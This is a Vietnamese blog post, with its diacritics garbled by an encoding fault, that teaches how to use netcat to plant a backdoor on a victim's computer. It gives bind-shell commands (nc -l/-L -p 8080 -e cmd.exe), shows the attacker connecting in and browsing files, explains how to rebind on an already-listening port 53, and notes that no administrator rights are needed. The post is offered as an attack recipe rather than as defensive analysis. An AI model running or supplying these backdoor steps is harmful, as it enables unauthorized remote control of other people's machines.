Netcat l� g�? S? d?ng n� d? t?o BackDoor nhu th? n�o?

Netcat l� g� ?
Netcat
Netcat

- Netcat l� m?t c�ng c? d� c� t? r?t l�u v?i nhi?u ti?n �ch c� th? vi?t v� d?c d? li?u qua TCP v� UDP

- Netcat c� th? du?c s? d?ng nhu m�y qu�t Port,Backdoor...

- Netcat l� m?t r?t t?t cho c�ng vi?c, th?m ch� l� bao g?m c? vi?c th? hi?n !

S? d?ng

- C� r?t nhi?u c�ch d? s? d?ng n� nhung ? d�y t? s? hu?ng d?n anh em t?o v� s? d?ng Netcat t?o BackDoor nh� !

- Tr�n m�y t�nh n?n nh�n, b?n kh?i d?ng netcat v�o ch? d? l?ng nghe, d�ng t�y ch?n �l(listen) v� �p port d? x�t d?nh s? hi?u c?ng l?ng nghe, -e d? y�u c?u netcat thi h�nh 1 chuong tr�nh khi c� m?t k?t n?i d?n, thu?ng l� shell l?nh cmd.exe ho?c /bin/sh (Unix). 
V� d? : 
E:>nc -nvv -l -p 8080 -e cmd.exe 
listening on [any] 8080 ... 
connect to [172.16.84.1] from (UNKNOWN) [172.16.84.1] 3159 
sent 0, rcvd 0: unknown socket error 

tr�n m�y t�nh d�ng d? t?n c�ng , ch? c?n d�ng netcat n?i d?n m�y n?n nh�n tr�n c?ng d� d?nh, ch?ng h?n nhu 8080 
C:>nc -nvv 172.16.84.2 8080 
(UNKNOWN) [172.16.84.2] 8080 (?) open 
Microsoft Windows 2000 [Version 5.00.2195] 
� Copyright 1985-1999 Microsoft Corp. 
E:>cd test 
cd test 
E:test>dir /w 
dir /w 
Volume in drive E has no label. 
Volume Serial Number is B465-452F 
Directory of E:test 
[.] [..] head.log NETUSERS.EXE NetView.exe ntcrash.zip password.txt pwdump.exe 
6 File(s) 262,499 bytes 
2 Dir(s) 191,488,000 bytes free 
C:test>exit 
exit 
sent 20, rcvd 450: NOTSOCK 

Nhu b?n th?y , ch�ng ta c� th? l�m b?t c? di?u g� d?i v?i m�y t�nh n?n nh?n qua l?nh shell, tuy nhien sau k?t n?i m�y t�nh n?n nh�n cung d�ng lu�n. �? y�u c?u netcat l?ng nghe tr? l?i sau m�i k?t n?i, b?n d�ng �L thay cho �l .m?t di?u luu � �L ch? c� th? �p d?ng cho b?n Netcat c?a Window, kh�ng �p d?ng cho Linux. 

E:>nc -nvv -L -p 8080 -e cmd.exe 
listening on [any] 8080 ... 

Ri�ng d?i v?i NetCat cho Win, b?n c� th? l?ng nghe ngay tr�n c?ng dang l?ng nghe, ch? c?n d?nh nghia d?a ch? ngu?n l� 
�s<diachi_ip_cua_may_nay>.v� d? : 
Netstat �a ... 
TCP nan_nhan:domain nan_nhan:0 listENING <- c?ng 53 dang l?ng nghe ... 
E:>nc -nvv -L -e cmd.exe -s 172.16.84.1 -p 53 > l?ng nghe ngay tr�n c?ng 53 
listening on [172.16.84.1] 53 ... 
connect to [172.16.84.1] from (UNKNOWN) [172.16.84.1] 3163 

Tr�n Window NT , d? d?t NetCat ? ch? d? l?ng nghe, kh�ng c?n ph?i c� quy?n Administrator, ch? c?n loign v�o b?ng m?t user b�nh thu?ng r?i kh?i d?ng NetCat l� xong. 

Ch� � : b?n kh�ng th? ch?y netcat v?i � -u �e cmd.exe� ho?c � -u �e /bin/sh�v� netcat s? kh�ng l�m vi?c d�ng, n?u b?n mu?n c� 1 UDP shell tren Unix , h�y d�ng udpshell thay cho netcat. HVA Author about that !



No comments:

Powered by Blogger.